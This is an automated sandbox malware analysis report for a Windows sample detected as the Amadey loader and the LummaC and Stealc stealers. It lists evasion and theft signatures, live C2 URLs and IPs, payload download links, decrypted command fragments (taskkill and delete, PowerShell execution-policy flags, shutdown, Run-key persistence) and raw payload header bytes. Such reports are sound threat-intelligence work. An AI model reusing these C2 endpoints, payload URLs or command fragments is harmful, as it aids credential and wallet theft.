Windows Analysis Report
p199AjsEFs.exe

Overview

General Information

Sample name: p199AjsEFs.exe (renamed because the original name is a hash value)
Original sample name: 65f0b432d1c478584099dd485f75a04f.exe
Analysis ID: 1599839
MD5: 65f0b432d1c478584099dd485f75a04f
SHA1: 95887097bb413477819a3a4850554e59dea5ed26
SHA256: e3f63b55b34a2e157b5754474b493afff810790cbcb166c40c355f4d64e3f154
Tags: exe, user-abuse_ch

Detection

Amadey, LummaC Stealer, Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Powershell launch regsvr32
Suricata IDS alerts for network traffic
Yara detected Amadey
Yara detected Amadey's stealer DLL
Yara detected LummaC Stealer
Yara detected Powershell download and execute
Yara detected Stealc
.NET source code contains potential unpacker
C2 URLs / IPs found in malware configuration
Contains functionality to capture screen (.Net source)
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Joe Sandbox ML detected suspicious sample
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
PE file has a writeable .text section
Potentially malicious time measurement code found
Queries memory information (via WMI often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Sigma detected: Potentially Suspicious Child Process Of Regsvr32
Suspicious powershell command line found
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries keyboard layouts
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Sigma detected: Potential Regsvr32 Commandline Flag Anomaly
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Classification chart (categories: Ransomware, Spreading, Phishing, Banker, Trojan / Bot, Adware, Spyware, Exploiter, Evader, Miner; scale: clean, suspicious, malicious)
Name: Amadey
Description: Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings, and its development relies on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, browser extensions and desktop cryptocurrency wallet applications, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

AV Detection

Source: p199AjsEFs.exe Avira: detected
Source: https://toppyneedus.biz/api: Avira URL Cloud: Label: malware
Source: http://185.215.113.39/files/unique3/random.exe Avira URL Cloud: Label: phishing
Source: https://toppyneedus.biz/piZZ Avira URL Cloud: Label: malware
Source: http://185.215.113.206/ Avira URL Cloud: Label: malware
Source: http://185.215.113.16/mine/random.exe? Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.php%. Avira URL Cloud: Label: malware
Source: http://185.215.113.43/Zu7JuNko/index.php& Avira URL Cloud: Label: malware
Source: https://toppyneedus.biz/d Avira URL Cloud: Label: malware
Source: https://toppyneedus.biz/s2 Avira URL Cloud: Label: malware
Source: https://toppyneedus.biz/pij Avira URL Cloud: Label: malware
Source: https://toppyneedus.biz/es Avira URL Cloud: Label: malware
Source: http://185.215.113.43/Zu7JuNko/index.phpu Avira URL Cloud: Label: malware
Source: http://185.215.113.43/ineer Avira URL Cloud: Label: malware
Source: https://toppyneedus.biz/apiz Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.php5d1ef941bc7800 Avira URL Cloud: Label: malware
Source: http://185.215.113.206 Avira URL Cloud: Label: malware
Source: http://185.215.113.43/Zu7JuNko/index.phpn Avira URL Cloud: Label: malware
Source: http://185.215.113.43/Zu7JuNko/index.phpm Avira URL Cloud: Label: malware
Source: http://185.215.113.16:80/mine/random.exe Avira URL Cloud: Label: malware
Source: http://185.215.113.39/files/sawdu5t/random.exe Avira URL Cloud: Label: phishing
Source: http://185.215.113.39/files/initlosizz198hyjdr/random.exe Avira URL Cloud: Label: phishing
Source: http://185.215.113.43/Zu7JuNko/index.phpr Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exe Avira: detection malicious, Label: TR/Crypt.XPACK.Gen
Source: 00000007.00000003.2479157827.0000000004F80000.00000004.00001000.00020000.00000000.sdmp Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
Source: p199AjsEFs.exe.2268.0.memstrmin Malware Configuration Extractor: LummaC {"C2 url": "https://toppyneedus.biz/api", "Build Version": "PsFKDg--pablo"}
Source: HT94GNC6NP3AGR6EM8I9D3647.exe.6316.3.memstrmin Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/c4becf79229cb002.php", "Botnet": "brat"}
Source: C:\ProgramData\CrossPlatformPlayer\CrossPlatformPlayer.exe ReversingLabs: Detection: 31%
Source: C:\Users\user\AppData\Local\Cross-platform Player 3.99\crossplatformplayer.exe ReversingLabs: Detection: 31%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[1].exe ReversingLabs: Detection: 55%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\random[1].exe ReversingLabs: Detection: 34%
Source: C:\Users\user\AppData\Local\Temp\1053901001\93f981a153.exe ReversingLabs: Detection: 34%
Source: C:\Users\user\AppData\Local\Temp\1053902001\264662bead.exe ReversingLabs: Detection: 55%
Source: C:\Users\user\AppData\Roaming\is-SE3IR.tmp ReversingLabs: Detection: 41%
Source: C:\Users\user\AppData\Roaming\uxtheme_2.drv (copy) ReversingLabs: Detection: 41%
Source: p199AjsEFs.exe Virustotal: Detection: 72%
Source: p199AjsEFs.exe ReversingLabs: Detection: 79%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Cross-platform Player 3.99\crossplatformplayer.exe Joe Sandbox ML: detected
Source: C:\ProgramData\CrossPlatformPlayer\CrossPlatformPlayer.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\dedicleb[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1053899001\dedicleb.exe Joe Sandbox ML: detected
Source: p199AjsEFs.exe Joe Sandbox ML: detected
Source: 00000007.00000003.2479157827.0000000004F80000.00000004.00001000.00020000.00000000.sdmp String decryptor: 185.215.113.43
Source: 00000007.00000003.2479157827.0000000004F80000.00000004.00001000.00020000.00000000.sdmp String decryptor: /Zu7JuNko/index.php
Source: 00000007.00000003.2479157827.0000000004F80000.00000004.00001000.00020000.00000000.sdmp String decryptor: S-%lu-
Source: 00000007.00000003.2479157827.0000000004F80000.00000004.00001000.00020000.00000000.sdmp String decryptor: abc3bc1985
Source: 00000007.00000003.2479157827.0000000004F80000.00000004.00001000.00020000.00000000.sdmp String decryptor: skotes.exe
Source: 00000007.00000003.2479157827.0000000004F80000.00000004.00001000.00020000.00000000.sdmp String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
Source: 00000007.00000003.2479157827.0000000004F80000.00000004.00001000.00020000.00000000.sdmp String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
Source: 00000007.00000003.2479157827.0000000004F80000.00000004.00001000.00020000.00000000.sdmp String decryptor: Startup
Source: 00000007.00000003.2479157827.0000000004F80000.00000004.00001000.00020000.00000000.sdmp String decryptor: cmd /C RMDIR /s/q
Source: 00000007.00000003.2479157827.0000000004F80000.00000004.00001000.00020000.00000000.sdmp String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: 00000007.00000003.2479157827.0000000004F80000.00000004.00001000.00020000.00000000.sdmp String decryptor: rundll32
Source: 00000007.00000003.2479157827.0000000004F80000.00000004.00001000.00020000.00000000.sdmp String decryptor: Programs
Source: 00000007.00000003.2479157827.0000000004F80000.00000004.00001000.00020000.00000000.sdmp String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
Source: 00000007.00000003.2479157827.0000000004F80000.00000004.00001000.00020000.00000000.sdmp String decryptor: %USERPROFILE%
Source: 00000007.00000003.2479157827.0000000004F80000.00000004.00001000.00020000.00000000.sdmp String decryptor: cred.dll|clip.dll|
Source: 00000007.00000003.2479157827.0000000004F80000.00000004.00001000.00020000.00000000.sdmp String decryptor: cred.dll
Source: 00000007.00000003.2479157827.0000000004F80000.00000004.00001000.00020000.00000000.sdmp String decryptor: clip.dll
Source: 00000007.00000003.2479157827.0000000004F80000.00000004.00001000.00020000.00000000.sdmp String decryptor: http://
Source: 00000007.00000003.2479157827.0000000004F80000.00000004.00001000.00020000.00000000.sdmp String decryptor: https://
Source: 00000007.00000003.2479157827.0000000004F80000.00000004.00001000.00020000.00000000.sdmp String decryptor: /quiet
Source: 00000007.00000003.2479157827.0000000004F80000.00000004.00001000.00020000.00000000.sdmp String decryptor: /Plugins/
Source: 00000007.00000003.2479157827.0000000004F80000.00000004.00001000.00020000.00000000.sdmp String decryptor: &unit=
Source: 00000007.00000003.2479157827.0000000004F80000.00000004.00001000.00020000.00000000.sdmp String decryptor: shell32.dll
Source: 00000007.00000003.2479157827.0000000004F80000.00000004.00001000.00020000.00000000.sdmp String decryptor: kernel32.dll
Source: 00000007.00000003.2479157827.0000000004F80000.00000004.00001000.00020000.00000000.sdmp String decryptor: GetNativeSystemInfo
Source: 00000007.00000003.2479157827.0000000004F80000.00000004.00001000.00020000.00000000.sdmp String decryptor: ProgramData\
Source: 00000007.00000003.2479157827.0000000004F80000.00000004.00001000.00020000.00000000.sdmp String decryptor: AVAST Software
Source: 00000007.00000003.2479157827.0000000004F80000.00000004.00001000.00020000.00000000.sdmp String decryptor: Kaspersky Lab
Source: 00000007.00000003.2479157827.0000000004F80000.00000004.00001000.00020000.00000000.sdmp String decryptor: Panda Security
Source: 00000007.00000003.2479157827.0000000004F80000.00000004.00001000.00020000.00000000.sdmp String decryptor: Doctor Web
Source: 00000007.00000003.2479157827.0000000004F80000.00000004.00001000.00020000.00000000.sdmp String decryptor: 360TotalSecurity
Source: 00000007.00000003.2479157827.0000000004F80000.00000004.00001000.00020000.00000000.sdmp String decryptor: Bitdefender
Source: 00000007.00000003.2479157827.0000000004F80000.00000004.00001000.00020000.00000000.sdmp String decryptor: Norton
Source: 00000007.00000003.2479157827.0000000004F80000.00000004.00001000.00020000.00000000.sdmp String decryptor: Sophos
Source: 00000007.00000003.2479157827.0000000004F80000.00000004.00001000.00020000.00000000.sdmp String decryptor: Comodo
Source: 00000007.00000003.2479157827.0000000004F80000.00000004.00001000.00020000.00000000.sdmp String decryptor: WinDefender
Source: 00000007.00000003.2479157827.0000000004F80000.00000004.00001000.00020000.00000000.sdmp String decryptor: 0123456789
Source: 00000007.00000003.2479157827.0000000004F80000.00000004.00001000.00020000.00000000.sdmp String decryptor: Content-Type: multipart/form-data; boundary=----
Source: 00000007.00000003.2479157827.0000000004F80000.00000004.00001000.00020000.00000000.sdmp String decryptor: ------
Source: 00000007.00000003.2479157827.0000000004F80000.00000004.00001000.00020000.00000000.sdmp String decryptor: ?scr=1
Source: 00000007.00000003.2479157827.0000000004F80000.00000004.00001000.00020000.00000000.sdmp String decryptor: Content-Type: application/x-www-form-urlencoded
Source: 00000007.00000003.2479157827.0000000004F80000.00000004.00001000.00020000.00000000.sdmp String decryptor: SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName
Source: 00000007.00000003.2479157827.0000000004F80000.00000004.00001000.00020000.00000000.sdmp String decryptor: ComputerName
Source: 00000007.00000003.2479157827.0000000004F80000.00000004.00001000.00020000.00000000.sdmp String decryptor: abcdefghijklmnopqrstuvwxyz0123456789-_
Source: 00000007.00000003.2479157827.0000000004F80000.00000004.00001000.00020000.00000000.sdmp String decryptor: -unicode-
Source: 00000007.00000003.2479157827.0000000004F80000.00000004.00001000.00020000.00000000.sdmp String decryptor: SYSTEM\CurrentControlSet\Control\UnitedVideo\CONTROL\VIDEO\
Source: 00000007.00000003.2479157827.0000000004F80000.00000004.00001000.00020000.00000000.sdmp String decryptor: SYSTEM\ControlSet001\Services\BasicDisplay\Video
Source: 00000007.00000003.2479157827.0000000004F80000.00000004.00001000.00020000.00000000.sdmp String decryptor: VideoID
Source: 00000007.00000003.2479157827.0000000004F80000.00000004.00001000.00020000.00000000.sdmp String decryptor: DefaultSettings.XResolution
Source: 00000007.00000003.2479157827.0000000004F80000.00000004.00001000.00020000.00000000.sdmp String decryptor: DefaultSettings.YResolution
Source: 00000007.00000003.2479157827.0000000004F80000.00000004.00001000.00020000.00000000.sdmp String decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
Source: 00000007.00000003.2479157827.0000000004F80000.00000004.00001000.00020000.00000000.sdmp String decryptor: ProductName
Source: 00000007.00000003.2479157827.0000000004F80000.00000004.00001000.00020000.00000000.sdmp String decryptor: CurrentBuild
Source: 00000007.00000003.2479157827.0000000004F80000.00000004.00001000.00020000.00000000.sdmp String decryptor: rundll32.exe
Source: 00000007.00000003.2479157827.0000000004F80000.00000004.00001000.00020000.00000000.sdmp String decryptor: "taskkill /f /im "
Source: 00000007.00000003.2479157827.0000000004F80000.00000004.00001000.00020000.00000000.sdmp String decryptor: " && timeout 1 && del
Source: 00000007.00000003.2479157827.0000000004F80000.00000004.00001000.00020000.00000000.sdmp String decryptor: && Exit"
Source: 00000007.00000003.2479157827.0000000004F80000.00000004.00001000.00020000.00000000.sdmp String decryptor: " && ren
Source: 00000007.00000003.2479157827.0000000004F80000.00000004.00001000.00020000.00000000.sdmp String decryptor: Powershell.exe
Source: 00000007.00000003.2479157827.0000000004F80000.00000004.00001000.00020000.00000000.sdmp String decryptor: -executionpolicy remotesigned -File "
Source: 00000007.00000003.2479157827.0000000004F80000.00000004.00001000.00020000.00000000.sdmp String decryptor: shutdown -s -t 0
Source: 00000007.00000003.2479157827.0000000004F80000.00000004.00001000.00020000.00000000.sdmp String decryptor: random

Compliance

Source: C:\Users\user\AppData\Local\Cross-platform Player 3.99\crossplatformplayer.exe Unpacked PE file: 14.2.crossplatformplayer.exe.400000.0.unpack
Source: p199AjsEFs.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp Registry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Cross-platform Player_is1
Source: unknown HTTPS traffic detected: 172.67.149.66:443 -> 192.168.2.6:49709 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.149.66:443 -> 192.168.2.6:49711 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.149.66:443 -> 192.168.2.6:49712 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.149.66:443 -> 192.168.2.6:49719 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.149.66:443 -> 192.168.2.6:49741 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.149.66:443 -> 192.168.2.6:49752 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.149.66:443 -> 192.168.2.6:49763 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.149.66:443 -> 192.168.2.6:49796 version: TLS 1.2
Source: Binary string: c:\zlib-dll\Release\isunzlib.pdb source: 264662bead.tmp, 00000010.00000003.3388150366.0000000002150000.00000004.00001000.00020000.00000000.sdmp, 264662bead.tmp, 00000010.00000003.3387702350.00000000034D5000.00000004.00001000.00020000.00000000.sdmp, 264662bead.tmp, 00000010.00000003.3383941896.00000000031A0000.00000004.00001000.00020000.00000000.sdmp, 264662bead.tmp, 00000012.00000003.3397747715.0000000002230000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.16.dr

Networking

Source: Network traffic Suricata IDS: 2059423 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (toppyneedus .biz) : 192.168.2.6:49766 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2059421 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (impolitewearr .biz) : 192.168.2.6:61778 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2059597 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (measlyrefusz .biz) : 192.168.2.6:64546 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2059424 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (toppyneedus .biz in TLS SNI) : 192.168.2.6:49709 -> 172.67.149.66:443
Source: Network traffic Suricata IDS: 2059424 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (toppyneedus .biz in TLS SNI) : 192.168.2.6:49711 -> 172.67.149.66:443
Source: Network traffic Suricata IDS: 2059424 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (toppyneedus .biz in TLS SNI) : 192.168.2.6:49719 -> 172.67.149.66:443
Source: Network traffic Suricata IDS: 2059424 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (toppyneedus .biz in TLS SNI) : 192.168.2.6:49712 -> 172.67.149.66:443
Source: Network traffic Suricata IDS: 2059424 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (toppyneedus .biz in TLS SNI) : 192.168.2.6:49741 -> 172.67.149.66:443
Source: Network traffic Suricata IDS: 2059424 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (toppyneedus .biz in TLS SNI) : 192.168.2.6:49752 -> 172.67.149.66:443
Source: Network traffic Suricata IDS: 2059424 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (toppyneedus .biz in TLS SNI) : 192.168.2.6:49763 -> 172.67.149.66:443
Source: Network traffic Suricata IDS: 2059424 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (toppyneedus .biz in TLS SNI) : 192.168.2.6:49796 -> 172.67.149.66:443
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:49850 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.6:49994 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.6:50000 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2044623 - Severity 1 - ET MALWARE Amadey Bot Activity (POST) : 192.168.2.6:50004 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.6:49998
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.6:50007 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.6:50009 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49709 -> 172.67.149.66:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49709 -> 172.67.149.66:443
Source: Network traffic Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.6:49719 -> 172.67.149.66:443
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.6:49711 -> 172.67.149.66:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49711 -> 172.67.149.66:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49796 -> 172.67.149.66:443
Source: Malware configuration extractor URLs: http://185.215.113.206/c4becf79229cb002.php
Source: Malware configuration extractor URLs: https://toppyneedus.biz/api
Source: Malware configuration extractor IPs: 185.215.113.43
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK; Server: nginx/1.18.0 (Ubuntu); Date: Sun, 26 Jan 2025 14:41:32 GMT; Content-Type: application/octet-stream; Content-Length: 1788416; Last-Modified: Sun, 26 Jan 2025 14:20:02 GMT; Connection: keep-alive; ETag: "67964492-1b4a00"; Accept-Ranges: bytes
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK; Server: nginx/1.18.0 (Ubuntu); Date: Sun, 26 Jan 2025 14:41:35 GMT; Content-Type: application/octet-stream; Content-Length: 1873408; Last-Modified: Sun, 26 Jan 2025 14:20:12 GMT; Connection: keep-alive; ETag: "6796449c-1c9600"; Accept-Ranges: bytes
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK; Date: Sun, 26 Jan 2025 14:42:32 GMT; Server: Apache/2.4.62 (Win64) PHP/8.4.2 OpenSSL/3.1.7; Last-Modified: Sat, 25 Jan 2025 14:32:27 GMT; ETag: "2eda0-62c88b660cb69"; Accept-Ranges: bytes; Content-Length: 191904; Vary: Accept-Encoding; Content-Type: application/x-msdownload
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sun, 26 Jan 2025 14:42:55 GMTContent-Type: application/octet-streamContent-Length: 1904640Last-Modified: Sun, 26 Jan 2025 13:23:28 GMTConnection: keep-aliveETag: "67963750-1d1000"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 44 f0 76 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 30 04 00 00 b8 00 00 00 00 00 00 00 00 4b 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 30 4b 00 00 04 00 00 4d b1 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 59 60 05 00 6d 00 00 00 00 50 05 00 ac 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 61 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 05 00 00 10 00 00 00 84 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 ac 01 00 00 00 50 05 00 00 02 00 00 00 94 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 60 05 00 00 02 00 00 00 96 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 30 2b 00 00 70 05 00 00 02 00 00 00 98 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 71 71 74 72 6d 6e 73 6b 00 50 1a 00 00 a0 30 00 00 50 1a 00 00 9a 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 
00 00 e0 6e 73 6b 6b 78 6d 7a 79 00 10 00 00 00 f0 4a 00 00 04 00 00 00 ea 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 00 4b 00 00 22 00 00 00 ee 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sun, 26 Jan 2025 14:43:04 GMTContent-Type: application/octet-streamContent-Length: 3672387Last-Modified: Sun, 26 Jan 2025 10:48:58 GMTConnection: keep-aliveETag: "6796131a-380943"Accept-Ranges: bytesData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 08 00 19 5e 42 2a 00 00 00 00 00 00 00 00 e0 00 8f 81 0b 01 02 19 00 9e 00 00 00 46 00 00 00 00 00 00 f8 a5 00 00 00 10 00 00 00 